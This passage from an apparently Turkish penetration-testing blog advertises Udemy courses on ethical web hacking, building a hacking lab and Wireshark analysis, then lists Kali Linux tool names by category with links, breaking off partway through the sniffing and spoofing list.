Penetration Testing, Web Application Security, Network Security<br />
Pentesttr<br />
<br />
<b>Ethical Web Hacking Methods</b> (Etik Web Hacking Yöntemleri), published 2018-04-23<br />
<div style="text-align: center;">
<a href="https://www.udemy.com/uygulamali-etik-web-hacking-yontemleri/">https://www.udemy.com/uygulamali-etik-web-hacking-yontemleri/</a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPwQnEDa8LG72LIy1QWPRv7i4MJBy-784APxAh1_vMt-xKSC_b35QWmLw-y8fIapEIi7t5sOFK7aRW09vCHE40a4TTYCe6ZmhtSusxMMSLZeVGQiltRWYUlOt3_8GwQ9VTNWSl-EdAFcc/s1600/etik.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="659" data-original-width="1136" height="231" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPwQnEDa8LG72LIy1QWPRv7i4MJBy-784APxAh1_vMt-xKSC_b35QWmLw-y8fIapEIi7t5sOFK7aRW09vCHE40a4TTYCe6ZmhtSusxMMSLZeVGQiltRWYUlOt3_8GwQ9VTNWSl-EdAFcc/s400/etik.PNG" width="400" /></a></div>
<br />
<br />
<br />
<br />
Ethical Web Hacking Methods is a clear, practical course that demonstrates web hacking and penetration testing at an intermediate level in a real lab environment. Its goal is to teach the hacking techniques currently in use, through real examples, professionally and without stepping outside the legal framework.<br />
All tools used in this course are free and readily available. The course follows a web hacking methodology, which consists of the following phases:<br />
<ol>
<li>Information Gathering</li>
<li>Vulnerability Detection</li>
<li>Gaining Access</li>
<li>Privilege Escalation</li>
</ol>
In each phase, the tools specific to that area are used hands-on to teach the underlying logic.<br />
<br />
If you too want to become competent in web hacking and penetration testing and learn practical techniques, be sure to buy this course. Please contact me for a coupon code.<br />
<br />
<b>Creating Hacking Lab</b>, published 2018-04-23<br />
<div style="text-align: center;">
<a href="https://www.udemy.com/creating-hacking-lab/" target="_blank"><b>Building a Lab for Hacking and Pentest Work</b></a></div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjynPAwwTRVWKhGWwuSw-3yEpuOERuq8VE8x5p1-W0amW_GxkvtTAVWihXiMKiWRe2FRg5_xtcQvMVHYeH25j4ZlL_W0L7Fg3bn5_LvgLjkA2TGXHIZqlzE_KrusSyLYXBf8s2Vy5AoYf4/s1600/create.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="722" data-original-width="1126" height="255" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjynPAwwTRVWKhGWwuSw-3yEpuOERuq8VE8x5p1-W0amW_GxkvtTAVWihXiMKiWRe2FRg5_xtcQvMVHYeH25j4ZlL_W0L7Fg3bn5_LvgLjkA2TGXHIZqlzE_KrusSyLYXBf8s2Vy5AoYf4/s400/create.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
The Creating Hacking Lab course:<br />
Build your own lab environment to examine, in detail and with more advanced tools, the pentest and hacking techniques you want to test in a virtual setting.<br />
This setup lets you test web, network, wireless and mobile hacking / penetration techniques more reliably and safely. Using mostly free and open-source tools, you can build experience and specialize in these areas.<br />
In your own lab environment you will be able to test the following with ease:<br />
<ul>
<li>Web hacking</li>
<li>Network hacking</li>
<li>Attacks against domain environments</li>
<li>Wireless network attacks</li>
<li>Mobile attacks</li>
</ul>
You will also learn about some basic configurations.<br />
By equipping the lab with more advanced tools, you can carry out comprehensive hacking / pentest work. By bringing IPS/IDS systems into the lab, you can build experience with advanced attack types and perform the necessary security tests.<br />
After this course, the web, network, wireless and mobile hacking / pentest courses and the Network Forensic and Kali 101 courses will be delivered in turn on the same lab we build here. This way you will be able both to build a lab and to test attacks in a real lab environment.<br />
<br />
<b>Network Traffic Analysis with Wireshark</b> (Wireshark ile Network Trafik Analizi), published 2018-04-23<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1XZJItyZR0-rfMXjm_iOFlUabEmvtJ5JtehDJzqcsOynRVzzSmsgpNsFAscwJWKoJuG6q8tcqAmFZQ7cBfnAz14xcMeR2wId3JV9TmM9E2A-BpCWGeYz8MS98L-VUZkXDdTFeAQXtA5g/s1600/wireshark.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="728" data-original-width="1141" height="255" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1XZJItyZR0-rfMXjm_iOFlUabEmvtJ5JtehDJzqcsOynRVzzSmsgpNsFAscwJWKoJuG6q8tcqAmFZQ7cBfnAz14xcMeR2wId3JV9TmM9E2A-BpCWGeYz8MS98L-VUZkXDdTFeAQXtA5g/s400/wireshark.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<a href="https://www.udemy.com/wireshark-ile-network-trafik-analiz-egitimi/" target="_blank">The Network Analysis with Wireshark course</a> makes it easier to understand the fundamentals of TCP/IP, analyze network traffic in a simple and clear way, and find solutions to problems.<br />
In this series, each lesson first covers the theory and then walks through the analysis process on real data.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
The Network Analysis with Wireshark course is a very good series for those who want to learn TCP/IP from the ground up, those who want to troubleshoot network traffic problems easily, and those who analyze security vulnerabilities.<br />
<br />
<b>KALI TOOLS</b>, published 2015-11-16<br />
<div class="post-1840 page type-page status-publish hentry" id="post-1840">
<div class="entry">
<div class="one_fourth">
<h5>
Information Gathering</h5>
<ul class="lcp_catlist" id="lcp_instance_0">
<li><a href="http://tools.kali.org/information-gathering/acccheck" title="acccheck">acccheck</a> </li>
<li><a href="http://tools.kali.org/information-gathering/ace-voip" title="ace-voip">ace-voip</a> </li>
<li><a href="http://tools.kali.org/information-gathering/amap" title="Amap">Amap</a> </li>
<li><a href="http://tools.kali.org/information-gathering/automater" title="Automater">Automater</a> </li>
<li><a href="http://tools.kali.org/information-gathering/bing-ip2hosts" title="bing-ip2hosts">bing-ip2hosts</a> </li>
<li><a href="http://tools.kali.org/information-gathering/braa" title="braa">braa</a> </li>
<li><a href="http://tools.kali.org/information-gathering/casefile" title="CaseFile">CaseFile</a> </li>
<li><a href="http://tools.kali.org/information-gathering/cdpsnarf" title="CDPSnarf">CDPSnarf</a> </li>
<li><a href="http://tools.kali.org/information-gathering/cisco-torch" title="cisco-torch">cisco-torch</a> </li>
<li><a href="http://tools.kali.org/information-gathering/cookie-cadger" title="Cookie Cadger">Cookie Cadger</a> </li>
<li><a href="http://tools.kali.org/information-gathering/copy-router-config" title="copy-router-config">copy-router-config</a> </li>
<li><a href="http://tools.kali.org/information-gathering/dmitry" title="DMitry">DMitry</a> </li>
<li><a href="http://tools.kali.org/information-gathering/dnmap" title="dnmap">dnmap</a> </li>
<li><a href="http://tools.kali.org/information-gathering/dnsenum" title="dnsenum">dnsenum</a> </li>
<li><a href="http://tools.kali.org/information-gathering/dnsmap" title="dnsmap">dnsmap</a> </li>
<li><a href="http://tools.kali.org/information-gathering/dnsrecon" title="DNSRecon">DNSRecon</a> </li>
<li><a href="http://tools.kali.org/information-gathering/dnstracer" title="dnstracer">dnstracer</a> </li>
<li><a href="http://tools.kali.org/information-gathering/dnswalk" title="dnswalk">dnswalk</a> </li>
<li><a href="http://tools.kali.org/information-gathering/dotdotpwn" title="DotDotPwn">DotDotPwn</a> </li>
<li><a href="http://tools.kali.org/information-gathering/enum4linux" title="enum4linux">enum4linux</a> </li>
<li><a href="http://tools.kali.org/information-gathering/enumiax" title="enumIAX">enumIAX</a> </li>
<li><a href="http://tools.kali.org/information-gathering/exploitdb" title="exploitdb">exploitdb</a> </li>
<li><a href="http://tools.kali.org/information-gathering/fierce" title="Fierce">Fierce</a> </li>
<li><a href="http://tools.kali.org/information-gathering/firewalk" title="Firewalk">Firewalk</a> </li>
<li><a href="http://tools.kali.org/information-gathering/fragroute" title="fragroute">fragroute</a> </li>
<li><a href="http://tools.kali.org/information-gathering/fragrouter" title="fragrouter">fragrouter</a> </li>
<li><a href="http://tools.kali.org/information-gathering/ghost-phisher" title="Ghost Phisher">Ghost Phisher</a> </li>
<li><a href="http://tools.kali.org/information-gathering/golismero" title="GoLismero">GoLismero</a> </li>
<li><a href="http://tools.kali.org/information-gathering/goofile" title="goofile">goofile</a> </li>
<li><a href="http://tools.kali.org/information-gathering/hping3" title="hping3">hping3</a> </li>
<li><a href="http://tools.kali.org/information-gathering/intrace" title="InTrace">InTrace</a> </li>
<li><a href="http://tools.kali.org/information-gathering/ismtp" title="iSMTP">iSMTP</a> </li>
<li><a href="http://tools.kali.org/information-gathering/lbd" title="lbd">lbd</a> </li>
<li><a href="http://tools.kali.org/information-gathering/maltego-teeth" title="Maltego Teeth">Maltego Teeth</a> </li>
<li><a href="http://tools.kali.org/information-gathering/masscan" title="masscan">masscan</a> </li>
<li><a href="http://tools.kali.org/information-gathering/metagoofil" title="Metagoofil">Metagoofil</a> </li>
<li><a href="http://tools.kali.org/information-gathering/miranda" title="Miranda">Miranda</a> </li>
<li><a href="http://tools.kali.org/information-gathering/nmap" title="Nmap">Nmap</a> </li>
<li><a href="http://tools.kali.org/information-gathering/ntop" title="ntop">ntop</a> </li>
<li><a href="http://tools.kali.org/information-gathering/p0f" title="p0f">p0f</a> </li>
<li><a href="http://tools.kali.org/information-gathering/parsero" title="Parsero">Parsero</a> </li>
<li><a href="http://tools.kali.org/information-gathering/recon-ng" title="Recon-ng">Recon-ng</a> </li>
<li><a href="http://tools.kali.org/information-gathering/set" title="SET">SET</a> </li>
<li><a href="http://tools.kali.org/information-gathering/smtp-user-enum" title="smtp-user-enum">smtp-user-enum</a> </li>
<li><a href="http://tools.kali.org/information-gathering/snmpcheck" title="snmpcheck">snmpcheck</a> </li>
<li><a href="http://tools.kali.org/information-gathering/sslcaudit" title="sslcaudit">sslcaudit</a> </li>
<li><a href="http://tools.kali.org/information-gathering/sslsplit" title="SSLsplit">SSLsplit</a> </li>
<li><a href="http://tools.kali.org/information-gathering/sslstrip" title="sslstrip">sslstrip</a> </li>
<li><a href="http://tools.kali.org/information-gathering/sslyze" title="SSLyze">SSLyze</a> </li>
<li><a href="http://tools.kali.org/information-gathering/thc-ipv6" title="THC-IPV6">THC-IPV6</a> </li>
<li><a href="http://tools.kali.org/information-gathering/theharvester" title="theHarvester">theHarvester</a> </li>
<li><a href="http://tools.kali.org/information-gathering/tlssled" title="TLSSLed">TLSSLed</a> </li>
<li><a href="http://tools.kali.org/information-gathering/twofi" title="twofi">twofi</a> </li>
<li><a href="http://tools.kali.org/information-gathering/urlcrazy" title="URLCrazy">URLCrazy</a> </li>
<li><a href="http://tools.kali.org/information-gathering/wireshark" title="Wireshark">Wireshark</a> </li>
<li><a href="http://tools.kali.org/information-gathering/wol-e" title="WOL-E">WOL-E</a> </li>
<li><a href="http://tools.kali.org/information-gathering/xplico" title="Xplico">Xplico</a> </li>
</ul>
</div>
<div class="one_fourth">
<h5>
Vulnerability Analysis</h5>
<ul class="lcp_catlist" id="lcp_instance_0">
<li><a href="http://tools.kali.org/vulnerability-analysis/bbqsql" title="BBQSQL">BBQSQL</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/bed" title="BED">BED</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/cisco-auditing-tool" title="cisco-auditing-tool">cisco-auditing-tool</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/cisco-global-exploiter" title="cisco-global-exploiter">cisco-global-exploiter</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/cisco-ocs" title="cisco-ocs">cisco-ocs</a> </li>
<li><a href="http://tools.kali.org/information-gathering/cisco-torch" title="cisco-torch">cisco-torch</a> </li>
<li><a href="http://tools.kali.org/information-gathering/copy-router-config" title="copy-router-config">copy-router-config</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/dbpwaudit" title="DBPwAudit">DBPwAudit</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/doona" title="Doona">Doona</a> </li>
<li><a href="http://tools.kali.org/information-gathering/dotdotpwn" title="DotDotPwn">DotDotPwn</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/greenbone-security-assistant" title="Greenbone Security Assistant">Greenbone Security Assistant</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/gsd" title="GSD">GSD</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/hexorbase" title="HexorBase">HexorBase</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/inguma" title="Inguma">Inguma</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/jsql" title="jSQL">jSQL</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/lynis" title="Lynis">Lynis</a> </li>
<li><a href="http://tools.kali.org/information-gathering/nmap" title="Nmap">Nmap</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/ohrwurm" title="ohrwurm">ohrwurm</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/openvas-administrator" title="openvas-administrator">openvas-administrator</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/openvas-cli" title="openvas-cli">openvas-cli</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/openvas-manager" title="openvas-manager">openvas-manager</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/openvas-scanner" title="openvas-scanner">openvas-scanner</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/oscanner" title="Oscanner ">Oscanner</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/powerfuzzer" title="Powerfuzzer">Powerfuzzer</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/sfuzz" title="sfuzz">sfuzz</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/sidguesser" title="SidGuesser">SidGuesser</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/siparmyknife" title="SIPArmyKnife">SIPArmyKnife</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/sqlmap" title="sqlmap">sqlmap</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/sqlninja" title="Sqlninja">Sqlninja</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/sqlsus" title="sqlsus">sqlsus</a> </li>
<li><a href="http://tools.kali.org/information-gathering/thc-ipv6" title="THC-IPV6">THC-IPV6</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/tnscmd10g" title="tnscmd10g">tnscmd10g</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/unix-privesc-check" title="unix-privesc-check">unix-privesc-check</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/yersinia" title="Yersinia">Yersinia</a> </li>
</ul>
<h5>
Exploitation Tools</h5>
<ul class="lcp_catlist" id="lcp_instance_0">
<li><a href="http://tools.kali.org/exploitation-tools/armitage" title="Armitage">Armitage</a> </li>
<li><a href="http://tools.kali.org/exploitation-tools/backdoor-factory" title="Backdoor Factory">Backdoor Factory</a> </li>
<li><a href="http://tools.kali.org/exploitation-tools/beef-xss" title="BeEF">BeEF</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/cisco-auditing-tool" title="cisco-auditing-tool">cisco-auditing-tool</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/cisco-global-exploiter" title="cisco-global-exploiter">cisco-global-exploiter</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/cisco-ocs" title="cisco-ocs">cisco-ocs</a> </li>
<li><a href="http://tools.kali.org/information-gathering/cisco-torch" title="cisco-torch">cisco-torch</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/crackle" title="crackle">crackle</a> </li>
<li><a href="http://tools.kali.org/web-applications/jboss-autopwn" title="jboss-autopwn">jboss-autopwn</a> </li>
<li><a href="http://tools.kali.org/exploitation-tools/linux-exploit-suggester" title="Linux Exploit Suggester">Linux Exploit Suggester</a> </li>
<li><a href="http://tools.kali.org/information-gathering/maltego-teeth" title="Maltego Teeth">Maltego Teeth</a> </li>
<li><a href="http://tools.kali.org/information-gathering/set" title="SET">SET</a> </li>
<li><a href="http://tools.kali.org/exploitation-tools/shellnoob" title="ShellNoob">ShellNoob</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/sqlmap" title="sqlmap">sqlmap</a> </li>
<li><a href="http://tools.kali.org/information-gathering/thc-ipv6" title="THC-IPV6">THC-IPV6</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/yersinia" title="Yersinia">Yersinia</a> </li>
</ul>
</div>
<div class="one_fourth">
<h5>
Wireless Attacks</h5>
<ul class="lcp_catlist" id="lcp_instance_0">
<li><a href="http://tools.kali.org/wireless-attacks/aircrack-ng" title="Aircrack-ng">Aircrack-ng</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/asleap" title="Asleap">Asleap</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/bluelog" title="Bluelog">Bluelog</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/bluemaho" title="BlueMaho">BlueMaho</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/bluepot" title="Bluepot">Bluepot</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/blueranger" title="BlueRanger">BlueRanger</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/bluesnarfer" title="Bluesnarfer">Bluesnarfer</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/bully" title="Bully">Bully</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/cowpatty" title="coWPAtty">coWPAtty</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/crackle" title="crackle">crackle</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/eapmd5pass" title="eapmd5pass">eapmd5pass</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/fern-wifi-cracker" title="Fern Wifi Cracker">Fern Wifi Cracker</a> </li>
<li><a href="http://tools.kali.org/information-gathering/ghost-phisher" title="Ghost Phisher">Ghost Phisher</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/giskismet" title="GISKismet">GISKismet</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/gqrx" title="Gqrx">Gqrx</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/gr-scan" title="gr-scan">gr-scan</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/kalibrate-rtl" title="kalibrate-rtl">kalibrate-rtl</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/killerbee" title="KillerBee">KillerBee</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/kismet" title="Kismet">Kismet</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/mdk3" title="mdk3">mdk3</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/mfcuk" title="mfcuk">mfcuk</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/mfoc" title="mfoc">mfoc</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/mfterm" title="mfterm">mfterm</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/multimon-ng" title="Multimon-NG">Multimon-NG</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/pixiewps" title="PixieWPS">PixieWPS</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/reaver" title="Reaver">Reaver</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/redfang" title="redfang">redfang</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/rtlsdr-scanner" title="RTLSDR Scanner">RTLSDR Scanner</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/spooftooph" title="Spooftooph">Spooftooph</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/wifi-honey" title="Wifi Honey">Wifi Honey</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/wifitap" title="Wifitap">Wifitap</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/wifite" title="Wifite">Wifite</a> </li>
</ul>
<h5>
Forensics Tools</h5>
<ul class="lcp_catlist" id="lcp_instance_0">
<li><a href="http://tools.kali.org/forensics/binwalk" title="Binwalk">Binwalk</a> </li>
<li><a href="http://tools.kali.org/forensics/bulk-extractor" title="bulk-extractor">bulk-extractor</a> </li>
<li><a href="http://tools.kali.org/forensics/capstone" title="Capstone">Capstone</a> </li>
<li><a href="http://tools.kali.org/password-attacks/chntpw" title="chntpw">chntpw</a> </li>
<li><a href="http://tools.kali.org/forensics/cuckoo" title="Cuckoo">Cuckoo</a> </li>
<li><a href="http://tools.kali.org/forensics/dc3dd" title="dc3dd">dc3dd</a> </li>
<li><a href="http://tools.kali.org/forensics/ddrescue" title="ddrescue">ddrescue</a> </li>
<li><a href="http://tools.kali.org/forensics/dff" title="DFF">DFF</a> </li>
<li><a href="http://tools.kali.org/reverse-engineering/distorm3" title="diStorm3">diStorm3</a> </li>
<li><a href="http://tools.kali.org/forensics/dumpzilla" title="Dumpzilla">Dumpzilla</a> </li>
<li><a href="http://tools.kali.org/forensics/extundelete" title="extundelete">extundelete</a> </li>
<li><a href="http://tools.kali.org/forensics/foremost" title="Foremost">Foremost</a> </li>
<li><a href="http://tools.kali.org/forensics/galleta" title="Galleta">Galleta</a> </li>
<li><a href="http://tools.kali.org/forensics/guymager" title="Guymager">Guymager</a> </li>
<li><a href="http://tools.kali.org/forensics/iphone-backup-analyzer" title="iPhone Backup Analyzer">iPhone Backup Analyzer</a> </li>
<li><a href="http://tools.kali.org/information-gathering/p0f" title="p0f">p0f</a> </li>
<li><a href="http://tools.kali.org/forensics/pdf-parser" title="pdf-parser">pdf-parser</a> </li>
<li><a href="http://tools.kali.org/forensics/pdfid" title="pdfid">pdfid</a> </li>
<li><a href="http://tools.kali.org/forensics/pdgmail" title="pdgmail">pdgmail</a> </li>
<li><a href="http://tools.kali.org/forensics/peepdf" title="peepdf">peepdf</a> </li>
<li><a href="http://tools.kali.org/forensics/regripper" title="RegRipper">RegRipper</a> </li>
<li><a href="http://tools.kali.org/forensics/volatility" title="Volatility">Volatility</a> </li>
<li><a href="http://tools.kali.org/information-gathering/xplico" title="Xplico">Xplico</a> </li>
</ul>
</div>
<div class="one_fourth last">
<h5>
Web Applications</h5>
<ul class="lcp_catlist" id="lcp_instance_0">
<li><a href="http://tools.kali.org/web-applications/apache-users" title="apache-users">apache-users</a> </li>
<li><a href="http://tools.kali.org/web-applications/arachni" title="Arachni">Arachni</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/bbqsql" title="BBQSQL">BBQSQL</a> </li>
<li><a href="http://tools.kali.org/web-applications/blindelephant" title="BlindElephant">BlindElephant</a> </li>
<li><a href="http://tools.kali.org/web-applications/burpsuite" title="Burp Suite">Burp Suite</a> </li>
<li><a href="http://tools.kali.org/web-applications/cutycapt" title="CutyCapt">CutyCapt</a> </li>
<li><a href="http://tools.kali.org/web-applications/davtest" title="DAVTest">DAVTest</a> </li>
<li><a href="http://tools.kali.org/web-applications/deblaze" title="deblaze">deblaze</a> </li>
<li><a href="http://tools.kali.org/web-applications/dirb" title="DIRB">DIRB</a> </li>
<li><a href="http://tools.kali.org/web-applications/dirbuster" title="DirBuster">DirBuster</a> </li>
<li><a href="http://tools.kali.org/web-applications/fimap" title="fimap">fimap</a> </li>
<li><a href="http://tools.kali.org/web-applications/funkload" title="FunkLoad">FunkLoad</a> </li>
<li><a href="http://tools.kali.org/web-applications/grabber" title="Grabber">Grabber</a> </li>
<li><a href="http://tools.kali.org/web-applications/jboss-autopwn" title="jboss-autopwn">jboss-autopwn</a> </li>
<li><a href="http://tools.kali.org/web-applications/joomscan" title="joomscan">joomscan</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/jsql" title="jSQL">jSQL</a> </li>
<li><a href="http://tools.kali.org/information-gathering/maltego-teeth" title="Maltego Teeth">Maltego Teeth</a> </li>
<li><a href="http://tools.kali.org/web-applications/padbuster" title="PadBuster">PadBuster</a> </li>
<li><a href="http://tools.kali.org/web-applications/paros" title="Paros">Paros</a> </li>
<li><a href="http://tools.kali.org/information-gathering/parsero" title="Parsero">Parsero</a> </li>
<li><a href="http://tools.kali.org/web-applications/plecost" title="plecost">plecost</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/powerfuzzer" title="Powerfuzzer">Powerfuzzer</a> </li>
<li><a href="http://tools.kali.org/web-applications/proxystrike" title="ProxyStrike">ProxyStrike</a> </li>
<li><a href="http://tools.kali.org/information-gathering/recon-ng" title="Recon-ng">Recon-ng</a> </li>
<li><a href="http://tools.kali.org/web-applications/skipfish" title="Skipfish">Skipfish</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/sqlmap" title="sqlmap">sqlmap</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/sqlninja" title="Sqlninja">Sqlninja</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/sqlsus" title="sqlsus">sqlsus</a> </li>
<li><a href="http://tools.kali.org/web-applications/ua-tester" title="ua-tester">ua-tester</a> </li>
<li><a href="http://tools.kali.org/web-applications/uniscan" title="Uniscan">Uniscan</a> </li>
<li><a href="http://tools.kali.org/web-applications/vega" title="Vega">Vega</a> </li>
<li><a href="http://tools.kali.org/web-applications/w3af" title="w3af">w3af</a> </li>
<li><a href="http://tools.kali.org/web-applications/webscarab" title="WebScarab">WebScarab</a> </li>
<li><a href="http://tools.kali.org/web-applications/webshag" title="Webshag">Webshag</a> </li>
<li><a href="http://tools.kali.org/web-applications/webslayer" title="WebSlayer">WebSlayer</a> </li>
<li><a href="http://tools.kali.org/web-applications/websploit" title="WebSploit">WebSploit</a> </li>
<li><a href="http://tools.kali.org/web-applications/wfuzz" title="Wfuzz">Wfuzz</a> </li>
<li><a href="http://tools.kali.org/web-applications/wpscan" title="WPScan">WPScan</a> </li>
<li><a href="http://tools.kali.org/web-applications/xsser" title="XSSer">XSSer</a> </li>
<li><a href="http://tools.kali.org/web-applications/zaproxy" title="zaproxy">zaproxy</a> </li>
</ul>
<h5>
Stress Testing</h5>
<ul class="lcp_catlist" id="lcp_instance_0">
<li><a href="http://tools.kali.org/stress-testing/dhcpig" title="DHCPig">DHCPig</a> </li>
<li><a href="http://tools.kali.org/web-applications/funkload" title="FunkLoad">FunkLoad</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/iaxflood" title="iaxflood">iaxflood</a> </li>
<li><a href="http://tools.kali.org/stress-testing/inundator" title="Inundator">Inundator</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/inviteflood" title="inviteflood">inviteflood</a> </li>
<li><a href="http://tools.kali.org/stress-testing/ipv6-toolkit" title="ipv6-toolkit">ipv6-toolkit</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/mdk3" title="mdk3">mdk3</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/reaver" title="Reaver">Reaver</a> </li>
<li><a href="http://tools.kali.org/stress-testing/rtpflood" title="rtpflood">rtpflood</a> </li>
<li><a href="http://tools.kali.org/stress-testing/slowhttptest" title="SlowHTTPTest">SlowHTTPTest</a> </li>
<li><a href="http://tools.kali.org/stress-testing/t50" title="t50">t50</a> </li>
<li><a href="http://tools.kali.org/stress-testing/termineter" title="Termineter">Termineter</a> </li>
<li><a href="http://tools.kali.org/information-gathering/thc-ipv6" title="THC-IPV6">THC-IPV6</a> </li>
<li><a href="http://tools.kali.org/stress-testing/thc-ssl-dos" title="THC-SSL-DOS">THC-SSL-DOS</a> </li>
</ul>
</div>
<div class="one_fourth">
<h5>
Sniffing & Spoofing</h5>
<ul class="lcp_catlist" id="lcp_instance_0">
<li><a href="http://tools.kali.org/web-applications/burpsuite" title="Burp Suite">Burp Suite</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/dnschef" title="DNSChef">DNSChef</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/fiked" title="fiked">fiked</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/hamster-sidejack" title="hamster-sidejack">hamster-sidejack</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/hexinject" title="HexInject">HexInject</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/iaxflood" title="iaxflood">iaxflood</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/inviteflood" title="inviteflood">inviteflood</a> </li>
<li><a href="http://tools.kali.org/information-gathering/ismtp" title="iSMTP">iSMTP</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/isr-evilgrade" title="isr-evilgrade">isr-evilgrade</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/mitmproxy" title="mitmproxy">mitmproxy</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/ohrwurm" title="ohrwurm">ohrwurm</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/protos-sip" title="protos-sip">protos-sip</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/rebind" title="rebind">rebind</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/responder" title="responder">responder</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/rtpbreak" title="rtpbreak">rtpbreak</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/rtpinsertsound" title="rtpinsertsound">rtpinsertsound</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/rtpmixsound" title="rtpmixsound">rtpmixsound</a> </li>
